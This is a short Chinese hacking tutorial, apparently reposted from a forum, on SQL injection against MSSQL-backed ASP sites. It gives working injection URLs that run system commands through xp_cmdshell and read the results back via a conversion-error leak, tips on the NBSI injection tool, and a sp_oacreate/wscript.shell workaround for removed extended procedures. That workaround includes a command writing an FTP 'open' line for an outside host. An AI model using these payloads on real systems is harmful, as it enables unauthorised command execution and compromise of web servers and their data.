| 关键词: 检测 语句 exec 正常 直接 方法 nbsp dirs http nbsi |
作者:Alpha 来自:http://www.cnwill.com/ 1.显示cmd执行的回显. 在注入是sa权限时,看不到命令的回显时件很痛苦的事情,在小竹兄的nbsi里也有一个尝试回显,可为什么要尝试了?呵呵 下面我说一种方法,绝对对可看到回显,不知道小竹兄用的是什么方法哦 建立表 语句:http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000));-- 返回:正常的信息!说明建表成功!继续! 语句:http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_cmdshell 'net user' ;-- 返回:正常信息。应该写入dirs数据正常 语句:http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs);-- 返回:Microsoft OLE DB Provider for SQL Server 错误 80040e07 将 varchar 值 '***'转换为数据类型为 int 的列时发生语法错误。 ^_^,这样我们就看到回显的结果了,当然,直接用nbsi暴表里的内容将更快速. 同理 ,其它的扩展也可以用这种方法得到内容哦,比如regread,(没有测试) 2. xp_dirtree写路径的问题 nbsi的目录列表工具不是很好用,有时候显示列不出来,实际上是出来了的哦,你直接暴表的数据(默认是NB_TreeList_Tmp)就看到内容了. 3.检测漏洞存在 nbsi的漏洞检测功能实在不敢恭维,对于写的像数字型的字符他都拒绝检测,就更不用说过滤了引号的类型了,所以还是建议手工检测,这样保证万无一失(:P) 4.删除xpsql70.dll和xp_cmdshell,and无法上传的问题解决 实际上很早以前czy大哥已经说过了,记得lzy好像也说过一个,不过和这个好像不一样 declare @s int exec sp_oacreate "wscript.shell",@s out --exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo open asp.7i24.com>c:\a.txt" 这个是在查询分析器里执行的,直接在地址栏里应该也是可以执行的,像这样 declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo aaa >c:\a.txt" 具体的没有在注入点测试 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|